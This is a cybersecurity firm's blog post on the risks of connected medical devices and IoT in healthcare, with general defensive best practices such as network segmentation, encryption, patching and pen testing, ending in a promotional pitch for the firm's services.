Medical devices and the IoT (Internet of Things), also known as the IoMT (Internet of Medical Things), connected to them have created advancements in patient care. They support many people every day living with chronic diseases, and the industry continues to innovate and grow. While there is much to praise about applying this technology in the medical realm, there are also risks. With any connected devices, security must be in the conversation.
IoT enables the collection, processing, and sharing of data, and those capabilities make it ideal for healthcare. From wearables to guided imagery to implantables, medical devices and IoT are changing how medical staff monitor and assess patients. It’s making healthcare more accessible, and the recent events of the pandemic made this technology a necessity.
As more things become part of networks and data volumes rise, the opportunity for breaches or other cyber incidents becomes greater. For any stakeholders in the medical device and IoT conversation, there are some key things you need to know about security.
In this post, we’ll review the current landscape, risks, and best practices regarding medical device and IoT security.
The Medical Device and IoT Landscape
Healthcare systems have been in a state of evolution for years, even before the pandemic. Technology investments flowed through the organizations to create efficiencies, manage data, and upgrade legacy systems. Technology was now a natural part of the healthcare ecosystem.
This shift in mindset around technology applications led to increased usage and development of medical devices connected to a network. Some of these were within the healthcare facility, and others were permanently implanted or worn by a patient.
Medical devices and IoT alleviated some of the challenges related to patient care, including the lack of staff and the need to capture data. This accelerated in 2020 when hospitals were stretched to the brink.
IoT becoming part of the medical device realm was a way to connect the physical world with the virtual world, leveraging edge sensors, which generate data that are easy to access and analyze. As a result, it became a viable way to monitor patients, locally or remotely. The data also has more uses, including the ability to use it in research relating to certain diseases.
Next, we’ll expand on applications.
Medical Device and IoT Applications
The healthcare sector has multiple ways to use medical devices and IoT. Here are the most common examples.
The most prevalent use of the technology is health monitoring. It works by using smart sensors, which measure and monitor various parameters of a patient. It can happen while they are in a facility or remotely.
Capitalizing on the remote aspect has been beneficial to healthcare systems. Non-critical patients don’t need to take up beds in hospitals. Additionally, it provides those that live in medical deserts, areas where healthcare facilities are minimal, better access to care. Monitoring of senior patients is another variation and much needed, considering the aging population.
In any of these settings, medical devices and IoT have many purposes, including:
- Tracking rehabilitation after injury
- Managing chronic diseases, such as diabetes, heart disease, or Parkinson’s disease
- Monitoring vitals post-surgery
The projection for this part of the industry is significant, with an estimate that there will be 70.6 million users of remote patient monitoring technology in the U.S. by 2025. This massive scale will create a host of security challenges. One of the most concerning will be the number of endpoints increasing. The patient could be accessing Wi-Fi at home or in public. The threat landscape expands, which multiplies the risk.
Medical devices connected to the internet and using IoT are another category. This includes things like pacemakers, drug infusion pumps, and cochlear implants or hearing aids. They, too, are collecting data that physicians monitor. It keeps them informed of how the patient is doing and if the device is working properly. There’s a data security element but also the concern of hacking.
The cybersecurity strategy for these medical devices is often more robust than those for monitoring. Both are equally important and could cause patient harm. While a hacking of a medical device has yet to occur that caused harm to a patient, like everything in cybersecurity, it’s when not if.
Let’s get further into the risk conversation next.
Medical Devices and IoT: The Cybersecurity Risks
So, when considering medical devices, IoT, and risk, there are many components. Hospitals are already attractive targets for cybercriminals. According to a recent cyber threat report, healthcare saw an increase in attacks by 755% in 2021. There have been headlines regularly about hospitals and ransomware attacks, leading to system outages and lost patient data. Those can cripple operations and put patients at risk.
Many healthcare organizations have robust systems to combat these attacks, but the volume alone makes it hard to dodge them all. Others are still maturing and modernizing. Now, the medical device and IoT segment is forcing the healthcare industry to create a new round of protocols, systems, and defenses.
The FDA has a role in this in terms of guidance around security for medical devices, but the healthcare system providing and monitoring them are the ultimate determiners of security policies.
The specific new risks that medical devices and IoT pose include:
- Securing IoT traffic from many devices and sensors is hard to manage and often overwhelming.
- Most all data collected is PHI (personal health information) and, therefore, subject to HIPAA guidelines.
- Remote IoT tampering to change settings or configurations.
- Unpatched and outdated software on the device creates vulnerabilities.
- Blocking attacks that would use the medical device as a gateway to enter the hospital system.
- Unauthorized access of a multi-tenant cloud, which most IoT devices use for data storage.
- Legacy systems connected to the medical device and IoT network, which may have outdated protocols.
The list of risks is long, and there’s no way to eliminate all of them. However, you can follow a series of best practices to mitigate it. A methodology of continuous improvement will be valuable as well.
Medical Devices and IoT: Security Best Practices
How do you build the most secure ecosystem for medical devices and IoT? Adhering to these best practices will help.
Improve Network Security with Segmentation
With network segmentation, you can silo multiple components by the flow of traffic. If medical devices and IoT live in their own sub-network, they don’t allow a means to access the entire system. Conversely, if hackers enter the hospital’s main network, they won’t be able to control these devices.
This IoT aggregation is a hub where you can manage, control, and modify as needed, away from other parts of the network.
Encrypt All Data
No matter how you generate, move, collect, or aggregate data, encryption should be part of the process. Encryption should include when data is at rest or in transit. Additionally, encryption techniques should protect the data from being decoded even if hackers intercept it.
Leverage AI-Driven Protection Systems
Traditional cybersecurity tools focus on detecting and preventing known threats. You’ll want to expand this further by employing AI-driven protection systems. They can provide more context and insight on who is attempting to access, from where, when, and how. This activity is nontypical and unfamiliar, but AI systems can detect them in real-time.
Conduct Regular Pen Tests
Pen tests find vulnerabilities, and any healthcare organization should perform them at least annually. You’ll want to find a pen test provider that specializes in healthcare and medical device cybersecurity. In this activity, you’ll learn where all your weaknesses are and be able to remediate them.
Automate Software Updates
The software running the medical device must stay up to date. If patches don’t install promptly, it’s another thing for cybercriminals to exploit. No matter the type of device or where it physically is, your medical device cybersecurity protocols should include the automation of updates. After an update, check the systems to ensure successful completion.
Defend Medical Devices and IoT from Malware
There are three methods to protect against malware in IoT. First is signature-based detection, which only applies to devices with small memory. It works by using antivirus system signatures. The second is static methods. This option uses the device’s static characteristics and allows you to do a malware search without changing the code. The third is dynamic, which tracks network behaviors for signs of threats.
Use All Other Cybersecurity Best Practices
The final piece of advice is to ensure that all other cybersecurity best practices are part of how you’re protecting medical devices and IoT. Those include firewalls, intrusion protection systems, advanced log monitoring, antivirus and antimalware, and authentication.
By combining the specific protocols for safe medical devices and those central to cybersecurity, you give your network the best chance to stay secure. The usage of the systems in healthcare will only grow, and so will the risks. Having a partner that can help you navigate this need today and tomorrow will provide great value.
At Blue Goat Cyber, we have significant healthcare expertise and medical device cybersecurity assessment and testing expertise. We can help you identify, mitigate, remediate, and monitor risk. Contact us today to learn more.